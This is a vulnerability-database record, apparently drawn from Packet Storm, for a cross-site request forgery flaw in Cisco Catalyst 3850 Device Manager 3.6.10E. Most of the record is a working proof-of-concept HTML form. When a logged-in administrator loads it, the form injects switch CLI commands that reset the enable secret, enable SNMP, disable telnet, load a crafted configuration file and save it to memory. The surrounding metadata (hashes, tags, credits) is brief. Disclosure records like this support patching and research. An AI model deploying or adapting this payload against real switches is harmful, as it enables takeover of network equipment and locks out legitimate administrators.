ID

VAR-E-201908-0137


TITLE

Cisco Catalyst 3850 Series Device Manager 3.6.10E Cross Site Request Forgery

Trust: 0.5

sources: PACKETSTORM: 153854

DESCRIPTION

Cisco Catalyst 3850 Series Device Manager version 3.6.10E suffers from a cross site request forgery vulnerability.

Trust: 0.5

sources: PACKETSTORM: 153854

AFFECTED PRODUCTS

vendor:ciscomodel:catalyst series device manager 3.6.10escope:eqversion:3850

Trust: 0.5

sources: PACKETSTORM: 153854

EXPLOIT

# Product : Catalyst 3850 Series Device Manager
# Version : 3.6.10E
# Date: 01.08.2019
# Vendor Homepage: https://www.cisco.com
# Exploit Author: Alperen Soydan
# Description : The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks to verify
the requests. This can be exploited to perform certain actions with
administrative privileges if a logged-in user visits a malicious web site.
@special thx:Haki Bülent Sever
# Tested On : Win10 & KaliLinux

Change Switch Password CSRF @Catalyst 3850 Series Device Manager
note : You must edit the values written by "place"
___________________________________________________________

<html>
<body>
<form
action="http://IP/%24moreField%20%0A%24a%20%24b1%0A%24c1%0A%24c2%0Awrite%20memory%0A"
method="POST">
<input type="hidden" name="SNMP_STATUS" value="SNMP+agent+enabled%0D%0A" />
<input type="hidden" name="send" value="nsback.htm" />
<input type="hidden" name="SNMP_READCOMM_DEFVAL" value="ELVIS" />
<input type="hidden" name="SNMP_CONTACT_DEFVAL" value="Network+Support+Group" />
<input type="hidden" name="SNMP_LOCATION_DEFVAL" value="TEST2" />
<input type="hidden" name="text_ipAddress0" value="place first octet" />
<input type="hidden" name="text_ipAddress1" value="place second octet" />
<input type="hidden" name="text_ipAddress2" value="place third octet" />
<input type="hidden" name="text_ipAddress3" value="place fourth octet" />
<input type="hidden" name="list_subnetMask" value="place subnet mask ip" />
<input type="hidden" name="text_ipDefaultGateway0" value="place gw ip first octet" />
<input type="hidden" name="text_ipDefaultGateway1" value="place gw ip second octet" />
<input type="hidden" name="text_ipDefaultGateway2" value="place gw ip third octet" />
<input type="hidden" name="text_ipDefaultGateway3" value="palce gw ip fourth octet" />
<input type="hidden" name="text_enableSecret" value="KEY" />
<input type="hidden" name="text_confirmEnableSecret" value="KEY" />
<input type="hidden" name="text_sysName" value="SW_TEST" />
<input type="hidden" name="list_date" value="19" />
<input type="hidden" name="list_month" value="Jul" />
<input type="hidden" name="list_year" value="2019" />
<input type="hidden" name="list_hour" value="10" />
<input type="hidden" name="list_minute" value="20" />
<input type="hidden" name="list_period" value="AM" />
<input type="hidden" name="list_timezone" value="C" />
<input type="hidden" name="radio_telnetAccess" value="disable" />
<input type="hidden" name="radio_snmpStatus" value="enable" />
<input type="hidden" name="text_snmpReadComm" value="ELVIS" />
<input type="hidden" name="text_sysContact" value="Network+Support+Group" />
<input type="hidden" name="text_sysLocation" value="TEST2" />
<input type="hidden" name="list_ipv6_interface" value="Vlan500" />
<input type="hidden" name="list_prefix" value="64" />
<input type="hidden" name="moreField" value="more flash:/html/more.txt" />
<input type="hidden" name="a" value="cluster pref file e.cli" />
<input type="hidden" name="z" value="cluster pref file append e.cli" />
<input type="hidden" name="b1" value="!enable secret KEY!ip http authentication enable!end" />
<input type="hidden" name="c1" value="copy e.cli running-config" />
<input type="hidden" name="c2" value="delete /force e.cli" />
<input type="submit" value="submit form" />
</form>
</body>
</html>

Trust: 0.5

sources: PACKETSTORM: 153854

EXPLOIT HASH

LOCAL

SOURCE

md5: bf640f52455eebc617b1932da2a81ef2
sha-1: ff546ce882ceb2f3f66586e1152ecece7f329ff6
sha-256: a079ae01655e5720718186f31d323af608aeaa58c70c805477a493c24496d12a
md5: bf640f52455eebc617b1932da2a81ef2

Trust: 0.5

sources: PACKETSTORM: 153854

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 153854

TYPE

csrf

Trust: 0.5

sources: PACKETSTORM: 153854

TAGS

tag:exploit

Trust: 0.5

tag:csrf

Trust: 0.5

sources: PACKETSTORM: 153854

CREDITS

Alperen Soydan

Trust: 0.5

sources: PACKETSTORM: 153854

EXTERNAL IDS

db:PACKETSTORMid:153854

Trust: 0.5

sources: PACKETSTORM: 153854

SOURCES

db:PACKETSTORMid:153854

LAST UPDATE DATE

2022-07-27T09:24:05.295000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:153854date:2019-08-01T14:44:44